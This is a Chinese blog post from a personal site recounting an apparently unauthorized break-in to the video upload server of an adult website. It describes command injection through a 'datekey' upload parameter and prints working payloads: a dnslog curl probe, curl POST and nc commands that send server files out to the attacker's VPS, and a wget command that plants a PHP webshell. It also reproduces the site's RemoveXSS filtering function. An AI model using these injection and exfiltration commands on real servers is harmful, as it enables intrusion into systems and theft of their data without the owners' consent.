<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.5.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.5.0" type="image/png" sizes="32x32"><meta name="google-site-verification" content="QDXQenTtxQ6MwW-M_7k9lw39Kq7F4pwFO0u1QAPYlDE"><meta name="description" content="起因        文中图片是后期补的，有些地方可能缺少图片  刚输了把排位，大师傅问我">
<meta property="og:type" content="article">
<meta property="og:title" content="对某颜色网站的一次渗透">
<meta property="og:url" content="http://www.7ten7.top/2020/03/14/2020-03-14-%E5%AF%B9%E6%9F%90%E9%A2%9C%E8%89%B2%E7%BD%91%E7%AB%99%E7%9A%84%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F/index.html">
<meta property="og:site_name" content="7TEN7&#39;s Blog">
<meta property="og:description" content="起因        文中图片是后期补的，有些地方可能缺少图片  刚输了把排位，大师傅问我">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://www.7ten7.top/images/20200314/Snipaste_2020-03-14_20-27-57.png">
<meta property="og:image" content="http://www.7ten7.top/images/20200314/Snipaste_2020-03-14_20-34-23.png">
<meta property="og:image" content="http://www.7ten7.top/images/20200314/Snipaste_2020-03-14_21-05-46.png">
<meta property="article:published_time" content="2020-03-13T16:00:00.000Z">
<meta property="article:modified_time" content="2020-04-23T14:57:29.202Z">
<meta property="article:author" content="7TEN7">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://www.7ten7.top/images/20200314/Snipaste_2020-03-14_20-27-57.png"><title>对某颜色网站的一次渗透 | 7TEN7's Blog</title><link ref="canonical" href="http://www.7ten7.top/2020/03/14/2020-03-14-%E5%AF%B9%E6%9F%90%E9%A2%9C%E8%89%B2%E7%BD%91%E7%AB%99%E7%9A%84%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F/"><link rel="alternate" href="/atom.xml" type="application/atom+xml"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.5.0"><script src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" data-ad-client="ca-pub-4793862971469188" async="" data-pjax=""></script><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":false,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"simple","highlight":"ocean","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: true,
  pjax: {"avoidBanner":false},
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 4.2.1"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner header-inner--height header-inner--bgcolor"><nav class="header-nav header-nav--sticky"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/friends/"><span class="header-nav-menu-item__icon"><i class="fas fa-link"></i></span><span class="header-nav-menu-item__text">友链</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">对某颜色网站的一次渗透</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2020-03-14</span></span><span class="post-meta-item post-meta-item--wordcount"><span class="post-meta-item__icon"><i class="far fa-file-word"></i></span><span class="post-meta-item__info">字数统计</span><span class="post-meta-item__value">1.5k</span></span><span class="post-meta-item post-meta-item--readtime"><span class="post-meta-item__icon"><i class="far fa-clock"></i></span><span class="post-meta-item__info">阅读时长</span><span class="post-meta-item__value">11分</span></span></div></header><div class="post-body">
        <h1 id="起因"   >
          <a href="#起因" class="heading-link"><i class="fas fa-link"></i></a>起因</h1>
      <blockquote>
<p>文中图片是后期补的，有些地方可能缺少图片</p>
</blockquote>
<p>刚输了把排位，大师傅问我</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="/images/20200314/Snipaste_2020-03-14_20-27-57.png"  alt="">
      <br><a id="more"></a></p>
<p>打开网站一看，哇，<del>搞颜色</del>(真香)，这种严重不符合社会主义核心价值的东西，必须铲除</p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="/images/20200314/Snipaste_2020-03-14_20-34-23.png"  alt="">
      </p>

        <h1 id="信息收集"   >
          <a href="#信息收集" class="heading-link"><i class="fas fa-link"></i></a>信息收集</h1>
      <p>这个站点是基于 ThinkPHP 5.0.24 开发，RCE漏洞也不存在了。</p>
<p>端口开放的也不多，端口上尝试了一下，没什么进展，就放弃了。</p>
<p>尝试了下目录扫描，因为是框架开发，路由做的很完善，也没扫到什么敏感信息。</p>
<p>只能针对该网站的功能进行逐一测试了，我自己测试了一些功能点后，最后只在留言框处发现一处XSS，尝试XSS盲打一波。至此也没发现其他重要线索了。</p>
<p>问大师傅有啥线索没，大师傅给了提示说视频上传处有机会。开始针对文件上传进行测试，因为电脑上没有较小的视频，所以我传了一部2个G的西红柿首富….就是因为这两个G，让我瞎折腾了好久。</p>
<p>因为上传视频过大，文件无法一次传输完毕，需要多次传输，而我抓取到的数据包就是分段传输的内容。重发数据包的响应内容均为 <strong>failed</strong> </p>
<p>无论改动什么参数，响应内容均为 <strong>failed</strong> ，这让我很无奈。</p>
<p>在进行上传之前，会发送一个签名数据包，修改数据包的 <strong>datekey</strong> 会报错，根据爆错信息来看是一个 <strong>insert</strong> 语句，插入的内容应该是视频的信息。经过一番测试，确定了这里存在注入，但无法报错注入，过滤了某些东西。</p>
<p>因为没有找到后台，注入这里也没继续往下挖掘了，等最后实在没办法了，在来想办法跑下数据库。</p>
<p>最后问了问大师傅，发现大师傅的上传数据包跟我的不一样(当时没发现问题在哪)…..就先不管了，把大师傅的数据包要过来进行测试。</p>

        <h1 id="突破"   >
          <a href="#突破" class="heading-link"><i class="fas fa-link"></i></a>突破</h1>
      <p>当我还在测试上传数据包的时候，大师傅告诉我他 <strong>RCE</strong> 了….</p>
<p>问了大师傅思路，查看上传数据包的响应内容，最前面是 <strong>PHP</strong> 的 <strong>WARRING</strong> 警告信息，最后有一句 <strong>bash</strong> 的删除命令。然后命令中的文件名称的一部分是从 <strong>datekey</strong> 参数处获取的。将 <strong>datekey</strong> 内容换成 payload</p>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">datekey = | curl `whoami`.dnslog |</span><br></pre></td></tr></table></div></figure>
<p>在 <strong>dnslog</strong> 平台成功获得回显。获得无回显RCE一枚。 </p>
<p>
        <img   class="lazyload lazyload-gif"
          src="/images/loading.svg" data-src="/images/20200314/Snipaste_2020-03-14_21-05-46.png"  alt="">
      </p>

        <h1 id="getshell"   >
          <a href="#getshell" class="heading-link"><i class="fas fa-link"></i></a>getshell</h1>
      <p>接下来就是想如何 getshell 了。这里想直接反弹一个shell回来，但试了用bash，python反弹都失败了。</p>
<p>然后通过 curl 的方式将文件内容给带出来，一开始尝试的是，<strong>curl vps:ip?id=`cat flag` </strong></p>
<p>但是要么无法获取内容，要么就是内容无法获取全。</p>
<p>最后利用 <strong>curl</strong> 命令上传文件，将文件内容放在 <strong>POST</strong> 数据包中带出。<strong>payload</strong> 如下：</p>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST -F xx=@filename vps_ip:pot <span class="comment"># 在目标上执行</span></span><br><span class="line">nc -lvp port <span class="comment"># 在 vps上执行</span></span><br></pre></td></tr></table></div></figure>
<p>利用这种方式，读取到了部分文件内容，通过阅读源码，知道了为什么无法使用 <strong>bash</strong> 以及 <strong>python</strong> 弹shell，因为输入都经过了一个过滤 <strong>XSS</strong> 的函数，某些特殊字符被过滤了，这也是之前报错注入无法注入的原因。过滤代码如下</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">RemoveXSS</span><span class="params">($val)</span> </span>&#123;</span><br><span class="line">   <span class="comment">// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed</span></span><br><span class="line">   <span class="comment">// this prevents some character re-spacing such as &lt;java\0script&gt;</span></span><br><span class="line">   <span class="comment">// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs</span></span><br><span class="line"></span><br><span class="line">   $val = preg_replace(<span class="string">'/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/'</span>, <span class="string">''</span>, $val);</span><br><span class="line">   <span class="comment">// straight replacements, the user should never need these since they're normal characters</span></span><br><span class="line">   <span class="comment">// this prevents like &lt;IMG SRC=@avascript:alert('XSS')&gt;</span></span><br><span class="line">   $search = <span class="string">'abcdefghijklmnopqrstuvwxyz'</span>;</span><br><span class="line">   $search .= <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span>;</span><br><span class="line">   $search .= <span class="string">'1234567890!@#$%^&amp;*()'</span>;</span><br><span class="line">   $search .= <span class="string">'~`";:?+/=&#123;&#125;[]-_|\'\\'</span>;</span><br><span class="line">   <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; strlen($search); $i++) &#123;</span><br><span class="line">      <span class="comment">// ;? matches the ;, which is optional</span></span><br><span class="line">      <span class="comment">// 0&#123;0,7&#125; matches any padded zeros, which are optional and go up to 8 chars</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// @ @ search for the hex values</span></span><br><span class="line">      $val = preg_replace(<span class="string">'/(&amp;#[xX]0&#123;0,8&#125;'</span>.dechex(ord($search[$i])).<span class="string">';?)/i'</span>, $search[$i], $val); <span class="comment">// with a ;</span></span><br><span class="line">      <span class="comment">// @ @ 0&#123;0,7&#125; matches '0' zero to seven times</span></span><br><span class="line">      $val = preg_replace(<span class="string">'/(&amp;#0&#123;0,8&#125;'</span>.ord($search[$i]).<span class="string">';?)/'</span>, $search[$i], $val); <span class="comment">// with a ;</span></span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line">   <span class="comment">// now the only remaining whitespace attacks are \t, \n, and \r</span></span><br><span class="line">   $ra1 = <span class="keyword">array</span>(<span class="string">'javascript'</span>, <span class="string">'vbscript'</span>, <span class="string">'expression'</span>, <span class="string">'applet'</span>, <span class="string">'meta'</span>, <span class="string">'xml'</span>, <span class="string">'blink'</span>, <span class="string">'link'</span>, <span class="string">'style'</span>, <span class="string">'script'</span>, <span class="string">'embed'</span>, <span class="string">'object'</span>, <span class="string">'iframe'</span>, <span class="string">'frame'</span>, <span class="string">'frameset'</span>, <span class="string">'ilayer'</span>, <span class="string">'layer'</span>, <span class="string">'bgsound'</span>, <span class="string">'title'</span>, <span class="string">'base'</span>);</span><br><span class="line">   $ra2 = <span class="keyword">array</span>(<span class="string">'onabort'</span>, <span class="string">'onactivate'</span>, <span class="string">'onafterprint'</span>, <span class="string">'onafterupdate'</span>, <span class="string">'onbeforeactivate'</span>, <span class="string">'onbeforecopy'</span>, <span class="string">'onbeforecut'</span>, <span class="string">'onbeforedeactivate'</span>, <span class="string">'onbeforeeditfocus'</span>, <span class="string">'onbeforepaste'</span>, <span class="string">'onbeforeprint'</span>, <span class="string">'onbeforeunload'</span>, <span class="string">'onbeforeupdate'</span>, <span class="string">'onblur'</span>, <span class="string">'onbounce'</span>, <span class="string">'oncellchange'</span>, <span class="string">'onchange'</span>, <span class="string">'onclick'</span>, <span class="string">'oncontextmenu'</span>, <span class="string">'oncontrolselect'</span>, <span class="string">'oncopy'</span>, <span class="string">'oncut'</span>, <span class="string">'ondataavailable'</span>, <span class="string">'ondatasetchanged'</span>, <span class="string">'ondatasetcomplete'</span>, <span class="string">'ondblclick'</span>, <span class="string">'ondeactivate'</span>, <span class="string">'ondrag'</span>, <span class="string">'ondragend'</span>, <span class="string">'ondragenter'</span>, <span class="string">'ondragleave'</span>, <span class="string">'ondragover'</span>, <span class="string">'ondragstart'</span>, <span class="string">'ondrop'</span>, <span class="string">'onerror'</span>, <span class="string">'onerrorupdate'</span>, <span class="string">'onfilterchange'</span>, <span class="string">'onfinish'</span>, <span class="string">'onfocus'</span>, <span class="string">'onfocusin'</span>, <span class="string">'onfocusout'</span>, <span class="string">'onhelp'</span>, <span class="string">'onkeydown'</span>, <span class="string">'onkeypress'</span>, <span class="string">'onkeyup'</span>, <span class="string">'onlayoutcomplete'</span>, <span class="string">'onload'</span>, <span class="string">'onlosecapture'</span>, <span class="string">'onmousedown'</span>, <span class="string">'onmouseenter'</span>, <span class="string">'onmouseleave'</span>, <span class="string">'onmousemove'</span>, <span class="string">'onmouseout'</span>, <span class="string">'onmouseover'</span>, <span class="string">'onmouseup'</span>, <span class="string">'onmousewheel'</span>, <span class="string">'onmove'</span>, <span class="string">'onmoveend'</span>, <span class="string">'onmovestart'</span>, <span class="string">'onpaste'</span>, <span class="string">'onpropertychange'</span>, <span class="string">'onreadystatechange'</span>, <span class="string">'onreset'</span>, <span class="string">'onresize'</span>, <span class="string">'onresizeend'</span>, <span class="string">'onresizestart'</span>, <span class="string">'onrowenter'</span>, <span class="string">'onrowexit'</span>, <span class="string">'onrowsdelete'</span>, <span class="string">'onrowsinserted'</span>, <span class="string">'onscroll'</span>, <span class="string">'onselect'</span>, <span class="string">'onselectionchange'</span>, <span class="string">'onselectstart'</span>, <span class="string">'onstart'</span>, <span class="string">'onstop'</span>, <span class="string">'onsubmit'</span>, <span class="string">'onunload'</span>);</span><br><span class="line">   $ra = array_merge($ra1, $ra2);</span><br><span class="line"></span><br><span class="line">   $found = <span class="keyword">true</span>; <span class="comment">// keep replacing as long as the previous round replaced something</span></span><br><span class="line">   <span class="keyword">while</span> ($found == <span class="keyword">true</span>) &#123;</span><br><span class="line">      $val_before = $val;</span><br><span class="line">      <span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; sizeof($ra); $i++) &#123;</span><br><span class="line">         $pattern = <span class="string">'/'</span>;</span><br><span class="line">         <span class="keyword">for</span> ($j = <span class="number">0</span>; $j &lt; strlen($ra[$i]); $j++) &#123;</span><br><span class="line">            <span class="keyword">if</span> ($j &gt; <span class="number">0</span>) &#123;</span><br><span class="line">               $pattern .= <span class="string">'('</span>;</span><br><span class="line">               $pattern .= <span class="string">'(&amp;#[xX]0&#123;0,8&#125;([9ab]);)'</span>;</span><br><span class="line">               $pattern .= <span class="string">'|'</span>;</span><br><span class="line">               $pattern .= <span class="string">'|(&amp;#0&#123;0,8&#125;([9|10|13]);)'</span>;</span><br><span class="line">               $pattern .= <span class="string">')*'</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            $pattern .= $ra[$i][$j];</span><br><span class="line">         &#125;</span><br><span class="line">         $pattern .= <span class="string">'/i'</span>;</span><br><span class="line">         $replacement = substr($ra[$i], <span class="number">0</span>, <span class="number">2</span>).<span class="string">'&lt;x&gt;'</span>.substr($ra[$i], <span class="number">2</span>); <span class="comment">// add in &lt;&gt; to nerf the tag</span></span><br><span class="line">         $val = preg_replace($pattern, $replacement, $val); <span class="comment">// filter out the hex tags</span></span><br><span class="line">         <span class="keyword">if</span> ($val_before == $val) &#123;</span><br><span class="line">            <span class="comment">// no replacements were made, so exit the loop</span></span><br><span class="line">            $found = <span class="keyword">false</span>;</span><br><span class="line">         &#125;</span><br><span class="line">      &#125;</span><br><span class="line">   &#125;</span><br><span class="line">        $val = htmlspecialchars($val);</span><br><span class="line">   <span class="keyword">return</span> $val;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>如何突破这个函数，其实方法应该是挺多的，我这里直接使用 <strong>wget</strong> 命令来下载脚本到目标上来进行 <strong>getshell</strong>。<strong>payload</strong> 如下。</p>
<figure class="highlight bash"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget -O shell.php vps_ip</span><br></pre></td></tr></table></div></figure>
<p>至此 getshell 完成。</p>

        <h1 id="结尾"   >
          <a href="#结尾" class="heading-link"><i class="fas fa-link"></i></a>结尾</h1>
      <p>这个上传服务器跟颜色网站不属于同一台服务器。然后因为这台上传服务器没有内网。也就没继续深入了。服务器上的数据库也就只有视频的一些属性信息，没有啥有趣的内容。</p>
<p>但这次遇到问题，然后突破的过程挺有趣的，比以前日的几个站都曲折一些，学到的也更多。</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://www.7ten7.top">7TEN7</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://www.7ten7.top/2020/03/14/2020-03-14-%E5%AF%B9%E6%9F%90%E9%A2%9C%E8%89%B2%E7%BD%91%E7%AB%99%E7%9A%84%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F/">http://www.7ten7.top/2020/03/14/2020-03-14-%E5%AF%B9%E6%9F%90%E9%A2%9C%E8%89%B2%E7%BD%91%E7%AB%99%E7%9A%84%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://www.7ten7.top/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2020/04/27/2020-04-27-PHP%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%AF%BC%E8%87%B4%E5%BC%95%E5%8F%B7%E9%80%83%E9%80%B8/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">PHP格式化字符串导致引号逃逸</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2020/02/15/2020-02-15-%E5%A6%82%E4%BD%95%E9%94%A4%E4%B8%80%E4%B8%AA%E5%A4%96%E6%8C%82%E7%BD%91%E7%AB%99/"><span class="paginator-prev__text">如何锤一个外挂网站</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="valine-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#起因"><span class="toc-number">1.</span> <span class="toc-text">
          起因</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#信息收集"><span class="toc-number">2.</span> <span class="toc-text">
          信息收集</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#突破"><span class="toc-number">3.</span> <span class="toc-text">
          突破</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#getshell"><span class="toc-number">4.</span> <span class="toc-text">
          getshell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#结尾"><span class="toc-number">5.</span> <span class="toc-text">
          结尾</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/author/author.png" alt="avatar"></div><p class="sidebar-ov-author__text">7TEN7</p></div><div class="sidebar-ov-feed"><span class="sidebar-ov-feed-rss"><a class="sidebar-ov-feed-rss__link" href="/atom.xml" target="_blank" rel="noopener"><span class="sidebar-ov-feed-rss__icon"><i class="fas fa-rss"></i></span><span>RSS 订阅</span></a></span></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">56</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">32</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__devider"></span><span>7TEN7</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1.0.1/dist/canvas-nest.min.js" color="255,255,255" opacity="1" count="200" zIndex="-1"></script><script src="https://cdn.jsdelivr.net/npm/lazyload@2.0.0-rc.2/lazyload.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax@latest/pjax.min.js"></script><script>window.addEventListener('DOMContentLoaded', function () {
  var pjax = new Pjax({"selectors":["head title","#main",".pjax-reload",".header-inner"],"history":true,"scrollTo":false,"scrollRestoration":false,"cacheBust":false,"debug":false,"currentUrlFullReload":false,"timeout":0});
  // 加载进度条的计时器
  var loadingTimer = null;

  // 重置页面 Y 方向上的滚动偏移量
  document.addEventListener('pjax:send', function () {
    $('.header-nav-menu').removeClass('show');
    if (CONFIG.pjax && CONFIG.pjax.avoidBanner) {
      $('html').velocity('scroll', {
        duration: 500,
        offset: $('#header').height(),
        easing: 'easeInOutCubic'
      });
    }

    var loadingBarWidth = 20;
    var MAX_LOADING_WIDTH = 95;

    $('.loading-bar').addClass('loading');
    $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    clearInterval(loadingTimer);
    loadingTimer = setInterval(function () {
      loadingBarWidth += 3;
      if (loadingBarWidth > MAX_LOADING_WIDTH) {
        loadingBarWidth = MAX_LOADING_WIDTH;
      }
      $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    }, 500);
  }, false);

  window.addEventListener('pjax:complete', function () {
    clearInterval(loadingTimer);
    $('.loading-bar__progress').css('width', '100%');
    $('.loading-bar').removeClass('loading');
    setTimeout(function () {
      $('.loading-bar__progress').css('width', '0');
    }, 400);
    $('link[rel=prefetch], script[data-pjax-rm]').each(function () {
      $(this).remove();
    });
    $('script[data-pjax], #pjax-reload script').each(function () {
      $(this).parent().append($(this).remove());
    });

    if (Stun.utils.pjaxReloadBoot) {
      Stun.utils.pjaxReloadBoot();
    }
    if (Stun.utils.pjaxReloadScroll) {
      Stun.utils.pjaxReloadScroll();
    }
    if (Stun.utils.pjaxReloadSidebar) {
      Stun.utils.pjaxReloadSidebar();
    }
    if (true) {
      if (Stun.utils.pjaxReloadHeader) {
        Stun.utils.pjaxReloadHeader();
      }
      if (Stun.utils.pjaxReloadScrollIcon) {
        Stun.utils.pjaxReloadScrollIcon();
      }
      if (Stun.utils.pjaxReloadLocalSearch) {
        Stun.utils.pjaxReloadLocalSearch();
      }
    }
  }, false);
}, false);</script><div id="pjax-reload"><script src="https://cdn.jsdelivr.net/npm/quicklink@1.0.1/dist/quicklink.umd.js"></script><script>function initQuicklink() {
  quicklink({
    timeout: '10000',
    priority: true,
    ignores: [uri => uri.includes('#'), uri => uri === 'http://www.7ten7.top/2020/03/14/2020-03-14-%E5%AF%B9%E6%9F%90%E9%A2%9C%E8%89%B2%E7%BD%91%E7%AB%99%E7%9A%84%E4%B8%80%E6%AC%A1%E6%B8%97%E9%80%8F/', /\/api\/?/,uri => uri.includes('.xml'),uri => uri.includes('.zip'),(uri, el) => el.hasAttribute('nofollow'),(uri, el) => el.hasAttribute('noprefetch')]
  });
}

if (true || false) {
  initQuicklink();
} else {
  window.addEventListener('DOMContentLoaded', initQuicklink, false);
}</script></div><script src="https://cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script data-pjax="">function loadValine () {
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var guest_info = 'nick,mail,link';

  guest_info = guest_info.split(',').filter(function(item) {
    return GUEST_INFO.indexOf(item) > -1;
  });
  new Valine({
    el: '#valine-container',
    appId: 'Nzl7LsK4moQuOsIfeWfbc8Rz-gzGzoHsz',
    appKey: '5xmoJuWrMWHpI7pwtJviyIh6',
    notify: true,
    verify: true,
    placeholder: 'Just go go',
    avatar: 'mp',
    meta: guest_info,
    pageSize: '10' || 10,
    visitor: false,
    recordIP: true,
    lang: '' || 'zh-cn',
    path: window.location.pathname
  });
}

if (true) {
  loadValine();
} else {
  window.addEventListener('DOMContentLoaded', loadValine, false);
}</script><script src="/js/utils.js?v=2.5.0"></script><script src="/js/stun-boot.js?v=2.5.0"></script><script src="/js/scroll.js?v=2.5.0"></script><script src="/js/header.js?v=2.5.0"></script><script src="/js/sidebar.js?v=2.5.0"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/assets/shizuku.model.json"},"display":{"position":"right","width":260,"height":380,"vOffset":5},"mobile":{"show":true},"log":false});</script></body></html>